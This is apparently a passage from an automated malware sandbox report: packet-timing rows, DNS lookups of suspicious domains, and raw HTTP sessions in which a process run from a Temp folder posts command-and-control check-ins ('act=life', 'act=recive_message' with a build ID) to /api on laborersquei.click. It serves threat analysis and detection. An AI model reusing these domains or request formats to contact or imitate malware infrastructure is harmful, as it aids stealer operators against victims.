                                                                                                                                                                              Dec 26, 2024 18:26:55.133517981 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.133594036 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.133599997 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.183722973 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.296766043 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.296783924 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.296860933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.296885014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.296905041 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.296943903 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.302645922 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.302660942 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.302730083 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.302747965 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.302788973 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.309499025 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.309513092 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.309562922 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.309578896 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.309622049 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.316734076 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.316747904 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.316817999 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.316833973 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.316893101 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.322932005 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.322945118 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.322998047 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.323014021 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.323055029 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.330569983 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.330585003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.330629110 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.330642939 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.330693960 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.336863995 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.336878061 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.336930990 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.336946011 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.336987019 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.348185062 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.348202944 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.348278999 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.348297119 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.348314047 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.348349094 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.507394075 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.507410049 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.507474899 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.507498980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.507551908 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.512860060 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.512873888 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.512923956 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.512933016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.512974977 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.519958019 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.519970894 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.520037889 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.520051003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.520092010 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.527152061 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.527167082 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.527220011 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.527234077 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.527273893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.533488035 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.533503056 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.533551931 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.533565044 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.533605099 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.541028023 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.541042089 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.541093111 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.541100979 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.541138887 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.547337055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.547354937 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.547404051 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.547410965 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.547447920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.558948994 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.558964014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.559010029 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.559015989 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.559061050 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.717765093 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.717788935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.719244003 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.719244003 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.719264030 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.719336987 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.723279953 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.723295927 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.723361015 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.723366976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.723413944 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.730669975 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.730684042 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.730742931 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.730748892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.730793953 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.737587929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.737610102 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.737653971 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.737659931 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.737715960 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.743829966 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.743844986 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.743904114 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.743910074 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.743953943 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.751486063 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.751502037 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.751560926 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.751564980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.751606941 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.757790089 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.757807970 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.757860899 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.757865906 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.757910967 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.769294024 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.769315958 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.769380093 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.769383907 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.769428015 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.771239042 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.928370953 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.928400040 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.928448915 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.928457022 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.928493977 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.928517103 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.933937073 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.933958054 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.933999062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.934003115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.934030056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.934046984 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.941102028 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.941122055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.941179037 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.941184998 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.941231012 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.948261023 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.948280096 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.948316097 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.948321104 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.948348045 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.948367119 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.955384016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.955404043 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.955446005 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.955451012 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.955472946 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.955495119 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.962089062 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.962110043 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.962158918 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.962162971 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.962205887 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.968516111 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.968535900 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.968585968 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.968590975 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.968642950 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.979847908 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.979870081 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.979923964 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:55.979928017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:55.979974031 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.138928890 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.138957024 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.139031887 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.139049053 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.139066935 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.139105082 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.144936085 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.144958019 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.145009995 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.145015955 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.145064116 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.152179956 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.152205944 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.152239084 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.152244091 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.152273893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.152290106 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.158497095 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.158515930 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.158567905 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.158572912 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.158613920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.160445929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.160499096 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.166690111 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.166735888 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.166743994 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.166750908 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.166796923 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.166801929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.166838884 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.166848898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.166886091 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.184797049 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.184812069 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:56.184822083 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:56.184828997 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 26, 2024 18:25:46.215816021 CET4933753192.168.2.161.1.1.1
                                                                                                                                                                              Dec 26, 2024 18:25:46.448079109 CET53493371.1.1.1192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:13.604159117 CET5021553192.168.2.161.1.1.1
                                                                                                                                                                              Dec 26, 2024 18:26:13.920167923 CET53502151.1.1.1192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:37.205328941 CET6334353192.168.2.161.1.1.1
                                                                                                                                                                              Dec 26, 2024 18:26:37.695780993 CET53633431.1.1.1192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.937535048 CET5124653192.168.2.161.1.1.1
                                                                                                                                                                              Dec 26, 2024 18:26:40.260569096 CET53512461.1.1.1192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:41.035145998 CET5885753192.168.2.161.1.1.1
                                                                                                                                                                              Dec 26, 2024 18:26:41.255564928 CET53588571.1.1.1192.168.2.16
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 26, 2024 18:25:46.215816021 CET192.168.2.161.1.1.10xfe18Standard query (0)MKEsavqGIoOOFKIkcwQOiuYAysc.MKEsavqGIoOOFKIkcwQOiuYAyscA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:13.604159117 CET192.168.2.161.1.1.10x5bb8Standard query (0)laborersquei.clickA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:37.205328941 CET192.168.2.161.1.1.10xbe6aStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:39.937535048 CET192.168.2.161.1.1.10xb40bStandard query (0)klipsyzogey.shopA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:41.035145998 CET192.168.2.161.1.1.10x6c4cStandard query (0)dfgh.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Dec 26, 2024 18:25:46.448079109 CET1.1.1.1192.168.2.160xfe18Name error (3)MKEsavqGIoOOFKIkcwQOiuYAysc.MKEsavqGIoOOFKIkcwQOiuYAyscnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:13.920167923 CET1.1.1.1192.168.2.160x5bb8No error (0)laborersquei.click172.67.166.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:13.920167923 CET1.1.1.1192.168.2.160x5bb8No error (0)laborersquei.click104.21.89.250A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:37.695780993 CET1.1.1.1192.168.2.160xbe6aNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:40.260569096 CET1.1.1.1192.168.2.160xb40bNo error (0)klipsyzogey.shop172.67.214.186A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:40.260569096 CET1.1.1.1192.168.2.160xb40bNo error (0)klipsyzogey.shop104.21.23.250A (IP address)IN (0x0001)false
                                                                                                                                                                              Dec 26, 2024 18:26:41.255564928 CET1.1.1.1192.168.2.160x6c4cName error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              • laborersquei.click
                                                                                                                                                                              • cegu.shop
                                                                                                                                                                              • klipsyzogey.shop
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.1649708172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:15 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                              2024-12-26 17:26:16 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:16 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=cjq11fp95h1odmk2416f14c54k; expires=Mon, 21 Apr 2025 11:12:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJq8n25Tgzzopbw7t%2FZUDmwxUuWjyISAdn645xMooIS0vP%2FVQRBfphH%2F5Fmu0%2BBhKZWhKMazbvvRZUSY85Q3DYAwRGE3%2FhSEZzBTIbQiu%2FaXxcrC6jxpq4a1VJlX9J5xa%2BR9fQs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f82c65c9fc64213-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1668&rtt_var=644&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1673352&cwnd=229&unsent_bytes=0&cid=35932be04360c77a&ts=1031&x=0"
                                                                                                                                                                              2024-12-26 17:26:16 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                              2024-12-26 17:26:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.1649709172.67.166.494432920C:\Users\user\AppData\Local\Temp\709182\Lightweight.com
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-26 17:26:17 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 80
                                                                                                                                                                              Host: laborersquei.click
                                                                                                                                                                              2024-12-26 17:26:17 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61
                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a
                                                                                                                                                                              2024-12-26 17:26:18 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 26 Dec 2024 17:26:18 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=k6c12ld6984c9mch813g3ml4bp; expires=Mon, 21 Apr 2025 11:12:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
